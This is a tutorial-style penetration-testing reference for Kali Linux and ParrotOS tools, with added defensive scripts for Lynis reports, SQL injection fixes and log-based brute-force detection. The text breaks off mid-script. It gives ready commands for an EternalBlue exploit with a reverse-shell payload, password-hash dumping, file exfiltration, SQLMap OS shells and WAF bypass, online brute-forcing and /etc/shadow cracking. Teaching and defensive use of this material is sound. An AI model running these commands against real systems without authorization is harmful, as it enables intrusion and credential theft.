Introduction
Penetration testing — or ethical hacking — is a structured, authorized simulation of real-world cyberattacks conducted to identify and remediate security vulnerabilities before malicious actors can exploit them. Two Linux distributions dominate the penetration testing landscape: Kali Linux and ParrotOS.
1.1 Kali Linux
Kali Linux, maintained by Offensive Security, is a Debian-based distribution purpose-built for penetration testing, digital forensics, and reverse engineering. Its rolling-release model ensures tools are continuously updated. The April 2026 release (Kali 2026.1) introduced LLM-driven command workflows alongside 600+ pre-installed security tools.
1.2 ParrotOS
ParrotOS (Parrot Security Edition), maintained by the Parrot Project, is a Debian-based distribution targeting penetration testers, digital forensics investigators, and privacy-conscious users. Compared to Kali, ParrotOS is lighter-weight, ships with additional anonymity tools (AnonSurf, Tor integration), and is well-suited for older hardware or resource-constrained environments.
1.3 Document Scope
This document covers the most widely used penetration testing tools across both platforms, organized by testing phase. For each tool, you will find a description, platform availability, installation instructions (where needed), and a complete set of step-by-step procedural commands.
Penetration Testing Methodology
A structured penetration test follows five phases recognized by PTES (Penetration Testing Execution Standard) and OWASP:
| Phase | Name | Description |
|---|---|---|
| 1 | Reconnaissance | Passive and active information gathering about the target. No system interaction that could trigger alerts. |
| 2 | Scanning & Enumeration | Actively probing the target with port scanners, banner grabbers, and vulnerability scanners to map attack surface. |
| 3 | Exploitation | Leveraging identified vulnerabilities to gain unauthorized access. Confirms exploitability and measures real-world risk. |
| 4 | Post-Exploitation | Escalating privileges, persisting access, moving laterally, and extracting sensitive data once inside the target. |
| 5 | Reporting | Documenting all findings with severity ratings, evidence, and remediation recommendations for stakeholders. |
Reconnaissance & Information Gathering Tools
Reconnaissance is the foundation of every penetration test. The tools in this section help testers map the target’s attack surface without (or before) direct interaction.
Nmap — Network Mapper
Nmap is the industry-standard open-source tool for network discovery and security auditing. It uses raw IP packets to determine active hosts, open ports, running services, service versions, operating systems, and more.
Installation
sudo apt update && sudo apt install nmap -y   # Kali / ParrotOS
Step-by-Step Procedures
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | Basic Host Discovery | nmap -sn 192.168.1.0/24 | Ping scan — lists live hosts without port scanning |
| 2 | TCP SYN Scan (Stealth) | sudo nmap -sS 192.168.1.100 | Half-open scan; requires root; less likely to be logged |
| 3 | Service Version Detection | sudo nmap -sV 192.168.1.100 | Probes open ports to identify service names and versions |
| 4 | OS Detection | sudo nmap -O 192.168.1.100 | TCP/IP stack fingerprinting to guess target OS |
| 5 | Full Aggressive Scan | sudo nmap -A -T4 192.168.1.100 | OS, versions, scripts, traceroute — most comprehensive |
| 6 | Scan Specific Port Range | nmap -p 1-1024 192.168.1.100 | Limits scan to ports 1 through 1024 |
| 7 | Scan Top 1000 UDP Ports | sudo nmap -sU --top-ports 1000 192.168.1.100 | UDP scanning is slow; use sparingly |
| 8 | NSE Vulnerability Scripts | nmap --script vuln 192.168.1.100 | Runs built-in vulnerability detection scripts |
| 9 | SMB Enumeration | nmap --script smb-enum-shares,smb-enum-users -p 445 192.168.1.100 | Enumerates SMB shares and user accounts |
| 10 | Save Output to File | nmap -oN output.txt -oX output.xml 192.168.1.100 | Saves results in normal and XML formats |
Key Flags Reference
| Flag / Option | Description |
|---|---|
| -sS | TCP SYN (stealth) scan — sends SYN, does not complete handshake |
| -sV | Probe open ports to determine service/version info |
| -O | Enable OS detection via TCP/IP fingerprinting |
| -A | Aggressive: enable OS detection, version detection, script scanning, traceroute |
| -T0 to -T5 | Timing template: T0=paranoid (slowest/stealthiest), T5=insane (fastest/noisiest) |
| -p- | Scan all 65535 TCP ports |
| -Pn | Skip host discovery — treat all hosts as online (bypasses firewall blocking ICMP) |
| --script | Run one or more NSE (Nmap Scripting Engine) scripts against target |
| -oN / -oX / -oG | Output formats: Normal text, XML, Grepable |
theHarvester — OSINT Email & Domain Recon
theHarvester is a passive reconnaissance tool that aggregates open-source intelligence (OSINT) from multiple public sources including search engines, DNS, PGP key servers, and SHODAN to gather email addresses, subdomains, IPs, and employee names associated with a domain.
Installation
sudo apt install theharvester -y
Step-by-Step Procedures
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | Basic Domain Harvest | theHarvester -d example.com -b google | Query Google for emails/subdomains of example.com |
| 2 | Multi-Source Search | theHarvester -d example.com -b google,bing,yahoo,duckduckgo | Query multiple search engines simultaneously |
| 3 | DNS Brute Force | theHarvester -d example.com -b google -c | -c enables DNS brute-force for subdomains |
| 4 | Limit Results | theHarvester -d example.com -b bing -l 300 | -l limits number of results returned |
| 5 | Include Shodan Integration | theHarvester -d example.com -b shodan -k <API_KEY> | Requires a Shodan API key |
| 6 | Save to HTML/XML | theHarvester -d example.com -b all -f harvest_output | Creates harvest_output.html and .xml report files |
| 7 | Full Source Search | theHarvester -d example.com -b all | Queries all available sources (may be slow) |
Recon-ng — Web Reconnaissance Framework
Recon-ng is a full-featured web reconnaissance framework written in Python. It provides an interactive console environment where modules can be loaded to harvest OSINT data from dozens of third-party APIs (Shodan, HaveIBeenPwned, VirusTotal, etc.). Results are stored in a local SQLite workspace database.
Step-by-Step Procedures
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | Launch recon-ng | recon-ng | Opens the interactive console (similar to Metasploit) |
| 2 | Create a workspace | workspaces create target_corp | Isolates data for each engagement |
| 3 | Install modules | marketplace install all | Downloads all available modules from the marketplace |
| 4 | Load a module | modules load recon/domains-hosts/hackertarget | Loads the hackertarget subdomain discovery module |
| 5 | Set target domain | options set SOURCE example.com | Sets the domain to investigate |
| 6 | Run the module | run | Executes the loaded module; results stored in DB |
| 7 | View results | show hosts | Displays all discovered hosts in the workspace |
| 8 | Export report | modules load reporting/html, then options set FILENAME /tmp/recon_report.html, then run | Generates an HTML report from workspace data |
Maltego — Link Analysis and OSINT Visualization
Maltego is a graphical OSINT and link-analysis tool that visualizes relationships between people, organizations, websites, domains, IP addresses, and social media accounts. It uses ‘Transforms’ — API calls to third-party data sources — to expand nodes in an interactive graph.
Step-by-Step Procedures
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | Launch Maltego | maltego | Opens the GUI application; requires free registration |
| 2 | Create a new graph | File > New Graph (Ctrl+T) | Each graph represents one investigation |
| 3 | Add a Domain entity | Drag ‘Domain’ entity onto canvas; set value to ‘example.com’ | Entities are the starting nodes of an investigation |
| 4 | Run DNS Transforms | Right-click entity > Run Transform > ‘DNS from Domain — MX’ | Discovers mail servers for the domain |
| 5 | Expand to IP addresses | Right-click domain > ‘Resolve to IP’ > Run All Transforms | Enumerates all A/CNAME records |
| 6 | Discover subdomains | Right-click domain > ‘DomainToDNSNameScheme’ | Brute-forces common subdomain names |
| 7 | Person/email pivot | Right-click email entity > ‘Email to Person’ | Links email addresses to possible identities |
| 8 | Export graph | File > Export Graph > PNG/PDF | Used for pentest report evidence |
Vulnerability Scanning Tools
Nikto — Web Server Vulnerability Scanner
Nikto is an open-source web server scanner that performs comprehensive tests against web servers, checking for over 6,700 potentially dangerous files/programs, outdated server versions, server configuration problems, and security misconfigurations.
Step-by-Step Procedures
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | Basic Scan | nikto -h http://192.168.1.100 | Scans web server on port 80 |
| 2 | Scan HTTPS Target | nikto -h https://192.168.1.100 -ssl | Forces SSL/TLS scan |
| 3 | Specify Port | nikto -h 192.168.1.100 -p 8080 | Scan on non-standard port |
| 4 | Scan with Authentication | nikto -h http://192.168.1.100 -id admin:password | Basic auth credentials in user:pass format |
| 5 | Scan via Proxy | nikto -h http://192.168.1.100 -useproxy http://127.0.0.1:8080 | Routes traffic through Burp Suite for logging |
| 6 | Tune Output (hide non-vulns) | nikto -h http://192.168.1.100 -Tuning x | x = exclude info messages; show only vulnerabilities |
| 7 | Save Output | nikto -h http://192.168.1.100 -o nikto_report.html -Format html | Saves formatted HTML report |
| 8 | Multiple Hosts from File | nikto -h targets.txt | targets.txt: one host per line |
OpenVAS / Greenbone — Network Vulnerability Scanner
OpenVAS (Open Vulnerability Assessment System), now part of the Greenbone Vulnerability Management (GVM) suite, is a full-featured vulnerability scanner with a web-based interface. It maintains a regularly updated feed of over 80,000 Network Vulnerability Tests (NVTs).
Step-by-Step Procedures
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | Install GVM | sudo apt install gvm -y | Installs the full Greenbone/OpenVAS suite |
| 2 | Initialize GVM | sudo gvm-setup | Downloads NVT feeds; may take 15–30 min on first run |
| 3 | Verify Setup | sudo gvm-check-setup | Confirms all services are running correctly |
| 4 | Start GVM Services | sudo gvm-start | Starts ospd-openvas, gvmd, and gsad services |
| 5 | Access Web Interface | Browser: https://127.0.0.1:9392 | Default credentials set during gvm-setup |
| 6 | Create Scan Target | Scans > Targets > New Target; Name: Lab-Target; Hosts: 192.168.1.100 | Define what will be scanned |
| 7 | Create Scan Task | Scans > Tasks > New Task; Scan Config: Full and Fast; Target: Lab-Target | ‘Full and Fast’ is recommended for most tests |
| 8 | Launch Scan | Click ‘Start’ (play button) on the task | Progress shown as percentage in task list |
| 9 | Review Results | Scans > Reports > Select Report Filter by Severity: High, Critical | CVE IDs and CVSS scores displayed per finding |
| 10 | Export Report | Report > Download > PDF/XML/CSV | Use PDF for executive reports, XML for tool import |
Lynis — Linux System Auditing Tool
Lynis is an open-source security auditing tool designed for Unix/Linux systems. Unlike network scanners, Lynis audits the local host: checking file permissions, installed packages, authentication configuration, kernel parameters, and compliance against CIS benchmarks.
Step-by-Step Procedures
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | Install Lynis | sudo apt install lynis -y | Available in default repos on both platforms |
| 2 | Full System Audit | sudo lynis audit system | Runs all security tests; takes 3–10 min |
| 3 | Non-interactive Mode | sudo lynis audit system --quick | Skips prompts; good for automated runs |
| 4 | Test Specific Category | sudo lynis audit system --tests-from-group firewall | Only runs firewall-related checks |
| 5 | View Report | cat /var/log/lynis-report.dat | Machine-readable report for post-processing |
| 6 | View Log | cat /var/log/lynis.log | Human-readable detailed log of all tests |
| 7 | Pentest Profile Mode | sudo lynis audit system --profile /etc/lynis/default.prf | Use custom profile for targeted compliance checks |
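Step 5 calls lynis-report.dat "machine-readable" but gives no hint of what to do with it. The script below is an added example (not part of Lynis) that parses the file's `key=value` layout, where repeated keys are written as `name[]` and hold pipe-separated records, and reduces it to the numbers a hardening tracker cares about: hardening index, warning and suggestion counts, and the test IDs involved. The report text is a constructed sample; the record field order (test ID, description, detail) is assumed from the format Lynis writes.

```python
"""Summarise a Lynis lynis-report.dat file. Added example, not Lynis code; the
SAMPLE_REPORT below is constructed in the key=value format Lynis uses."""
from collections import defaultdict

SAMPLE_REPORT = """# Lynis Report (constructed sample)
report_version_major=1
report_version_minor=0
hostname=lab-host
os=Linux
hardening_index=64
warning[]=FIRE-4512|iptables module(s) loaded, but no rules active|-|-|
warning[]=SSH-7412|Root login via SSH is enabled|PermitRootLogin|-|
suggestion[]=SSH-7408|Consider hardening SSH configuration|PermitRootLogin (set YES to NO)|-|
suggestion[]=SSH-7408|Consider hardening SSH configuration|MaxAuthTries (set 6 to 3)|-|
suggestion[]=KRNL-6000|One or more sysctl values differ from the scan profile|-|-|
installed_packages=512
"""

def parse_lynis_report(text):
    """Return {'scalars': {key: value}, 'lists': {key: [value, ...]}}.
    Keys ending in [] repeat; everything else is a single value."""
    scalars, lists = {}, defaultdict(list)
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        if key.endswith("[]"):
            lists[key[:-2]].append(value)
        else:
            scalars[key] = value
    return {"scalars": scalars, "lists": dict(lists)}

def findings_by_test(report, kind):
    """Group 'warning' or 'suggestion' records by test ID: {test_id: [(text, detail), ...]}.
    Assumes the record layout test_id|description|detail|...; '-' means no detail."""
    grouped = defaultdict(list)
    for record in report["lists"].get(kind, []):
        fields = record.split("|")
        text = fields[1] if len(fields) > 1 else ""
        detail = fields[2] if len(fields) > 2 and fields[2] != "-" else ""
        grouped[fields[0]].append((text, detail))
    return dict(grouped)

def summarize(text):
    """Compact view for comparing one audit run against the next."""
    report = parse_lynis_report(text)
    warnings = findings_by_test(report, "warning")
    suggestions = findings_by_test(report, "suggestion")
    return {
        "hostname": report["scalars"].get("hostname"),
        "hardening_index": int(report["scalars"].get("hardening_index", 0)),
        "warning_count": sum(len(v) for v in warnings.values()),
        "suggestion_count": sum(len(v) for v in suggestions.values()),
        "warning_tests": sorted(warnings),
        "suggestion_tests": sorted(suggestions),
    }

if __name__ == "__main__":
    # On a real host: summarize(open("/var/log/lynis-report.dat").read())
    print(summarize(SAMPLE_REPORT))
```

Because warnings are grouped by test ID, two runs can be diffed on `warning_tests` to see which findings were actually closed rather than just watching the hardening index move.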
Exploitation Tools
Metasploit Framework — Exploitation Platform
Metasploit is the world’s most widely used penetration testing framework. It provides an extensive library of exploits, payloads, auxiliary modules, and post-exploitation tools within a unified console interface (msfconsole). Its modular architecture allows testers to quickly combine exploit code with payloads to compromise target systems.
Core Workflow — Exploiting a Vulnerable Service
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | Start Metasploit Console | msfconsole | Opens the MSF interactive shell; startup takes ~20s |
| 2 | Search for an Exploit | search eternalblue — OR — search type:exploit name:smb | Searches module library by keyword, type, or name |
| 3 | Load Exploit Module | use exploit/windows/smb/ms17_010_eternalblue | Selects the EternalBlue SMB exploit (MS17-010) |
| 4 | View Required Options | show options | Lists REQUIRED and optional configuration parameters |
| 5 | Set Target Host | set RHOSTS 192.168.1.105 | RHOSTS = remote/target host IP or range |
| 6 | Set Local Host | set LHOST 192.168.1.10 | LHOST = your machine’s IP (for reverse shell) |
| 7 | Select Payload | set PAYLOAD windows/x64/meterpreter/reverse_tcp | Meterpreter = advanced in-memory payload |
| 8 | Run the Exploit | exploit (or run) | Launches the exploit; successful = Meterpreter session |
| 9 | Meterpreter — System Info | sysinfo | Displays OS, hostname, architecture of compromised host |
| 10 | Meterpreter — Shell | shell | Drops into a native OS command shell |
| 11 | Meterpreter — Screenshot | screenshot | Captures screenshot from target desktop |
| 12 | Meterpreter — Download File | download C:\\Users\\Admin\\secret.txt /tmp/ | Exfiltrates a file to attacker machine |
| 13 | Privilege Escalation | getsystem | Attempts automatic privilege escalation to SYSTEM |
| 14 | Dump Password Hashes | hashdump | Extracts SAM database password hashes |
| 15 | Background Session | background, then sessions -l, then sessions -i 1 | Background and resume sessions; -i resumes session 1 |
Auxiliary Module — Port Scanning with Metasploit
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | Load TCP Scanner | use auxiliary/scanner/portscan/tcp | Metasploit’s built-in TCP port scanner |
| 2 | Set target range | set RHOSTS 192.168.1.0/24, then set PORTS 21,22,23,80,443,445,3389 | Scan entire subnet for specific ports |
| 3 | Run scanner | run | Results stored in msfdb and displayed in console |
SQLMap — Automated SQL Injection
SQLMap is an open-source tool that automates the detection and exploitation of SQL injection flaws in web applications. It supports all major database engines (MySQL, MSSQL, PostgreSQL, Oracle, SQLite, etc.) and can extract databases, tables, credentials, and execute OS commands through the injection point.
Step-by-Step Procedures
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | Detect SQL Injection in URL | sqlmap -u "http://target.com/page?id=1" | Tests the 'id' parameter for SQLi vulnerability |
| 2 | List All Databases | sqlmap -u "http://target.com/page?id=1" --dbs | Enumerates accessible database names |
| 3 | List Tables in DB | sqlmap -u "http://target.com/page?id=1" -D webapp --tables | Lists all tables in the 'webapp' database |
| 4 | Dump Table Contents | sqlmap -u "http://target.com/page?id=1" -D webapp -T users --dump | Extracts all rows from the 'users' table |
| 5 | Specify Injection Technique | sqlmap -u "http://target.com/page?id=1" --technique=BEUST | B=Boolean, E=Error, U=Union, S=Stacked, T=Time |
| 6 | Test POST Request | sqlmap -u "http://target.com/login" --data="user=admin&pass=test" -p user | -p specifies which parameter to test; --data for POST |
| 7 | Use Intercepted Request | sqlmap -r request.txt | request.txt: raw HTTP request saved from Burp Suite |
| 8 | Bypass WAF with Tamper | sqlmap -u "http://target.com/?id=1" --tamper=space2comment | Tamper scripts obfuscate payloads to bypass WAFs |
| 9 | OS Command Execution | sqlmap -u "http://target.com/?id=1" --os-shell | Attempts to spawn interactive OS shell via SQL injection |
| 10 | Set Risk and Level | sqlmap -u "http://target.com/?id=1" --level=5 --risk=3 | Higher levels = more tests; risk 3 = destructive tests (use with care) |
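What SQLMap is probing for in the 'id' parameter is a query assembled from untrusted input. The script below is an added example (not from the page or the SQLMap project) showing the defect and its fix side by side against an in-memory SQLite table: a login lookup built by string formatting, which a tautology in the Boolean technique (the B in --technique=BEUST) turns into "match every row", and the same lookup with bound parameters, where the identical input is treated as data. The table contents and the payload string are constructed; passwords are stored in plaintext only to keep the example short.

```python
"""SQL injection: vulnerable string-built query beside the parameterised fix.
Added example against an in-memory SQLite database; rows are constructed sample data."""
import sqlite3

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("admin", "s3cret!"), ("alice", "hunter2")])
    conn.commit()
    return conn

def login_vulnerable(conn, username, password):
    """Untrusted input becomes part of the SQL text. With a tautology payload the
    WHERE clause is rewritten so every row satisfies it."""
    query = ("SELECT username FROM users WHERE username = '%s' AND password = '%s' "
             "ORDER BY id" % (username, password))
    return [row[0] for row in conn.execute(query)]

def login_safe(conn, username, password):
    """Same lookup with bound parameters: the driver sends the values separately,
    so quotes and keywords in the input never reach the SQL parser as syntax."""
    query = "SELECT username FROM users WHERE username = ? AND password = ? ORDER BY id"
    return [row[0] for row in conn.execute(query, (username, password))]

# Classic tautology payload (constructed). In the vulnerable query it yields
#   ... WHERE username = '' OR '1'='1' AND password = '' OR '1'='1' ORDER BY id
# which, with AND binding tighter than OR, is true for every row.
PAYLOAD = "' OR '1'='1"

if __name__ == "__main__":
    conn = make_db()
    print("vulnerable, real creds :", login_vulnerable(conn, "admin", "s3cret!"))
    print("vulnerable, payload    :", login_vulnerable(conn, PAYLOAD, PAYLOAD))
    print("safe, real creds       :", login_safe(conn, "admin", "s3cret!"))
    print("safe, payload          :", login_safe(conn, PAYLOAD, PAYLOAD))
```

The fix is the parameter placeholder, not input filtering: tamper scripts such as space2comment exist precisely because keyword and whitespace filters can be rewritten around, while a bound parameter cannot change the query's structure.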
Password Attack Tools
Hashcat — GPU-Accelerated Password Cracker
Hashcat is the world’s fastest password recovery utility. It leverages GPU parallelism to crack hashed passwords using dictionary attacks, brute-force, rule-based, and hybrid attacks. It supports over 350 hash types including MD5, SHA-1, SHA-256, NTLM, bcrypt, WPA-PMKID, and more.
Step-by-Step Procedures
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | Identify Hash Type | hashcat --identify hash.txt — OR — hashid -m '5f4dcc3b5aa765d61d8327deb882cf99' | Always confirm hash type before cracking |
| 2 | Dictionary Attack (MD5) | hashcat -m 0 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt | -m 0 = MD5; -a 0 = dictionary; rockyou.txt = wordlist |
| 3 | NTLM Hash Crack | hashcat -m 1000 -a 0 ntlm_hashes.txt /usr/share/wordlists/rockyou.txt | -m 1000 = NTLM; common in Windows AD environments |
| 4 | WPA2 WiFi Handshake | hashcat -m 2500 -a 0 handshake.hccapx /usr/share/wordlists/rockyou.txt | -m 2500 = WPA-EAPOL; requires captured 4-way handshake |
| 5 | Brute-Force Attack | hashcat -m 0 -a 3 hash.txt ?u?l?l?l?d?d?d?d | ?u=uppercase, ?l=lowercase, ?d=digit; masks define charset |
| 6 | Rule-Based Attack | hashcat -m 0 -a 0 hash.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule | Applies mutation rules to each wordlist entry |
| 7 | Show Cracked Passwords | hashcat -m 0 hashes.txt --show | Displays previously cracked passwords from potfile |
| 8 | Resume Interrupted Session | hashcat --session mysession --restore | Sessions can be saved and resumed later |
Common Hash Mode Reference (-m values)
| Flag / Option | Description |
|---|---|
| -m 0 | MD5 |
| -m 100 | SHA-1 |
| -m 1400 | SHA-256 |
| -m 1000 | NTLM (Windows passwords) |
| -m 1800 | SHA-512 crypt (Linux /etc/shadow) |
| -m 3200 | bcrypt (web application passwords) |
| -m 2500 | WPA/WPA2 EAPOL (Wi-Fi handshake) |
| -m 13100 | Kerberos TGS-REP (Kerberoasting) |
Hydra — Online Password Brute-Forcer
Hydra is a fast, parallelized online login cracker supporting over 50 protocols including FTP, SSH, Telnet, HTTP, HTTPS, SMB, LDAP, SMTP, MySQL, and RDP. It performs dictionary or brute-force attacks against live authentication services.
Step-by-Step Procedures
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | SSH Brute-Force | hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100 | -l = single username; -P = password list file |
| 2 | SSH with User List | hydra -L users.txt -P passwords.txt ssh://192.168.1.100 | -L = username list; -P = password list |
| 3 | FTP Brute-Force | hydra -l ftp_user -P rockyou.txt ftp://192.168.1.100 | Standard FTP login brute-force |
| 4 | HTTP POST Form | hydra -l admin -P rockyou.txt 192.168.1.100 http-post-form “/login:user=^USER^&pass=^PASS^:Invalid credentials” | Replace field names and failure string for target form |
| 5 | RDP Brute-Force | hydra -l Administrator -P rockyou.txt rdp://192.168.1.105 | Targets Windows Remote Desktop Protocol |
| 6 | Set Parallel Tasks | hydra -l admin -P rockyou.txt -t 16 ssh://192.168.1.100 | -t = threads per target; default is 16 |
| 7 | Add Delay Between Attempts | hydra -l admin -P rockyou.txt -w 3 ssh://192.168.1.100 | -w = wait time in seconds (avoids lockout) |
| 8 | Save Valid Credentials | hydra -l admin -P rockyou.txt -o creds.txt ssh://192.168.1.100 | -o saves found credentials to file |
John the Ripper — Password Hash Cracker
John the Ripper (JtR) is a versatile, CPU-based password cracker designed for offline hash cracking and Linux /etc/shadow files. The community ‘Jumbo’ edition supports over 400 hash types and includes specialized tools (ssh2john, zip2john, etc.) to extract hashes from file formats.
Step-by-Step Procedures
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | Crack /etc/shadow (Linux) | sudo unshadow /etc/passwd /etc/shadow > combined.txt && john combined.txt | unshadow merges passwd and shadow for John to process |
| 2 | Dictionary Attack | john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt | Standard wordlist-based crack |
| 3 | Crack SSH Private Key | ssh2john id_rsa > id_rsa_hash.txt && john id_rsa_hash.txt --wordlist=rockyou.txt | ssh2john extracts crackable hash from passphrase-protected key |
| 4 | Crack ZIP Archive Password | zip2john protected.zip > zip_hash.txt && john zip_hash.txt --wordlist=rockyou.txt | zip2john extracts hash from encrypted ZIP file |
| 5 | Show Cracked Passwords | john --show hashes.txt | Displays cracked passwords from session |
| 6 | Specify Hash Format | john --format=NT hashes.txt --wordlist=rockyou.txt | Explicitly specify hash type if auto-detect fails |
| 7 | Apply Mangling Rules | john hashes.txt --wordlist=rockyou.txt --rules=Jumbo | Jumbo rule set applies extensive word mutations |
Web Application Testing Tools
Burp Suite Community Edition — Web App Proxy
Burp Suite is the industry-standard toolkit for web application security testing. Its intercepting proxy sits between the browser and target web server, enabling testers to inspect, modify, and replay HTTP/S requests. Key modules include Proxy, Repeater, Intruder, Scanner, Decoder, and Sequencer.
Step-by-Step Procedures — Core Workflow
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | Launch Burp Suite | burpsuite | Opens Burp Suite GUI; choose Temporary Project |
| 2 | Configure Browser Proxy | Browser > Settings > Manual Proxy; HTTP Proxy: 127.0.0.1, Port: 8080 | All HTTP/S traffic now routes through Burp |
| 3 | Install Burp CA Certificate | Browser: navigate to http://burpsuite; Download CA Cert; import into browser trust store | Required to intercept HTTPS without cert errors |
| 4 | Enable Intercept | Proxy tab > Intercept > ‘Intercept is on’ | Burp will hold each request until forwarded/dropped |
| 5 | Browse the Target App | Navigate target app in browser | All requests appear in HTTP History for review |
| 6 | Send Request to Repeater | HTTP History > Right-click request > ‘Send to Repeater’ | Repeater lets you modify and replay individual requests |
| 7 | Modify and Replay Request | Repeater tab > Edit params in request panel > ‘Send’ | Used to manually test for SQLi, XSS, auth bypass, etc. |
| 8 | Send to Intruder (Fuzzing) | Right-click request > ‘Send to Intruder’; Intruder > Positions > highlight param > ‘Add §’ | Intruder automates fuzzing a parameter with a payload list |
| 9 | Run Intruder Attack | Intruder > Payloads > Load wordlist file; Attack > Start Attack | Results show status codes; look for 200 vs 401/302 |
| 10 | Decode/Encode Data | Decoder tab > Paste value > Select encoding type > Decode/Encode | Supports Base64, URL, HTML, Hex, Gzip encodings |
OWASP ZAP — Open-Source Web App Scanner
OWASP ZAP (Zed Attack Proxy) is a free, open-source web application security scanner. Unlike Burp Suite Community, ZAP includes a built-in automated scanner and is scriptable via Python/JavaScript for CI/CD pipeline integration.
Step-by-Step Procedures
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | Launch ZAP | zaproxy | Opens ZAP GUI; select ‘Automated Scan’ for quick start |
| 2 | Spider the Target | Quick Start > URL to attack: http://target.com > Attack | Spider crawls all links; Active Scan probes for vulnerabilities |
| 3 | Manual Proxy Browse | Set browser proxy: 127.0.0.1:8080; browse target app | ZAP captures all requests in Sites tree |
| 4 | Active Scan a Node | Sites tree > Right-click target > Attack > Active Scan | Automated scanning of the target with probe requests |
| 5 | View Alerts | Alerts tab > Filter by Risk: High/Medium | ZAP categorizes findings by risk level with CWE references |
| 6 | Forced Browse (DirBuster) | Tools > Forced Browse Site; select fuzz list > Start | Discovers hidden paths and files on web server |
| 7 | Generate HTML Report | Report > Generate HTML Report > Save | Includes all alerts, descriptions, and solution guidance |
| 8 | Run in CLI Mode (CI/CD) | zap.sh -cmd -quickurl http://target.com -quickprogress -quickout report.html | Headless automated scan for DevSecOps pipelines |
Dirb & Gobuster — Web Content Discovery
Dirb and Gobuster are wordlist-based web content scanners that brute-force URIs (directories and files) on a web server to discover hidden content such as admin panels, backup files, configuration files, and API endpoints not linked from the main site.
Dirb Procedures
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | Basic Directory Scan | dirb http://192.168.1.100/ | Uses default wordlist (/usr/share/dirb/wordlists/common.txt) |
| 2 | Custom Wordlist | dirb http://192.168.1.100/ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | Larger lists find more but take longer |
| 3 | Scan Specific Extensions | dirb http://192.168.1.100/ -X .php,.txt,.bak,.conf | Appends extensions to each wordlist entry |
| 4 | Save Output | dirb http://192.168.1.100/ -o dirb_output.txt | Saves discovered URLs to file |
Gobuster Procedures (Faster Alternative)
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | Install Gobuster | sudo apt install gobuster -y | Pre-installed on most Kali/Parrot versions |
| 2 | Directory Brute-Force | gobuster dir -u http://192.168.1.100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | ‘dir’ mode; -u = URL; -w = wordlist |
| 3 | With File Extensions | gobuster dir -u http://192.168.1.100 -w common.txt -x php,html,txt,bak | -x appends comma-separated extensions |
| 4 | DNS Subdomain Fuzzing | gobuster dns -d example.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt | ‘dns’ mode discovers subdomains; requires SecLists |
| 5 | Virtual Host Fuzzing | gobuster vhost -u http://example.com -w subdomains.txt | ‘vhost’ mode brute-forces virtual host names |
| 6 | Set Threads and Timeout | gobuster dir -u http://target.com -w wordlist.txt -t 50 --timeout 15s | -t = threads (default 10); higher = faster but noisier |
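Both the Hydra procedure above (the -w delay exists because failed logins pile up in the server's auth log) and the Gobuster/Dirb procedure (the "noisier" threads note refers to the burst of 404s a content scan leaves in the web server's access log) have the same server-side footprint: many failures from one source in a short window. The script below is an added example, not code from the page or from either tool, that reads both log formats and applies one sliding-window burst detector to each, plus the case worth triaging first, a successful SSH login from a source that had just been failing. The log lines, addresses and user agents are constructed; thresholds are assumptions to tune per environment.

```python
"""Detect login brute force (sshd auth log) and web content discovery (combined-format
access log) as bursts of failures per source IP. Added example with constructed logs."""
import re
from collections import defaultdict
from datetime import datetime

AUTH_LOG = """\
Mar  3 10:15:01 web01 sshd[2201]: Failed password for admin from 192.168.1.10 port 51234 ssh2
Mar  3 10:15:01 web01 sshd[2202]: Failed password for admin from 192.168.1.10 port 51235 ssh2
Mar  3 10:15:02 web01 sshd[2203]: Failed password for invalid user test from 192.168.1.10 port 51236 ssh2
Mar  3 10:15:02 web01 sshd[2204]: Failed password for admin from 192.168.1.10 port 51237 ssh2
Mar  3 10:15:03 web01 sshd[2205]: Failed password for admin from 192.168.1.10 port 51238 ssh2
Mar  3 10:15:03 web01 sshd[2206]: Accepted password for admin from 192.168.1.10 port 51239 ssh2
Mar  3 10:20:44 web01 sshd[2310]: Failed password for alice from 10.0.0.7 port 40001 ssh2
Mar  3 10:21:10 web01 sshd[2311]: Accepted publickey for alice from 10.0.0.7 port 40002 ssh2
"""
ACCESS_LOG = """\
192.168.1.10 - - [03/Mar/2026:10:30:00 +0000] "GET /admin HTTP/1.1" 404 153 "-" "gobuster/3.6"
192.168.1.10 - - [03/Mar/2026:10:30:00 +0000] "GET /backup HTTP/1.1" 404 153 "-" "gobuster/3.6"
192.168.1.10 - - [03/Mar/2026:10:30:00 +0000] "GET /config.php HTTP/1.1" 404 153 "-" "gobuster/3.6"
192.168.1.10 - - [03/Mar/2026:10:30:01 +0000] "GET /uploads HTTP/1.1" 301 0 "-" "gobuster/3.6"
192.168.1.10 - - [03/Mar/2026:10:30:01 +0000] "GET /.git/HEAD HTTP/1.1" 404 153 "-" "gobuster/3.6"
192.168.1.10 - - [03/Mar/2026:10:30:01 +0000] "GET /api HTTP/1.1" 404 153 "-" "gobuster/3.6"
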